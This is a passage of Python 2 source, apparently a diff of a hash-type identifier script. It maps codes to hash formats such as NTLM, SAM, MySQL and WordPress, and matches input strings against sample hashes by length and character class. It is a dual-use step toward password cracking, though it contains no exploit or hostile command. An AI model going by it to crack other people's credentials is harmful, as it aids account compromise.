"101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - 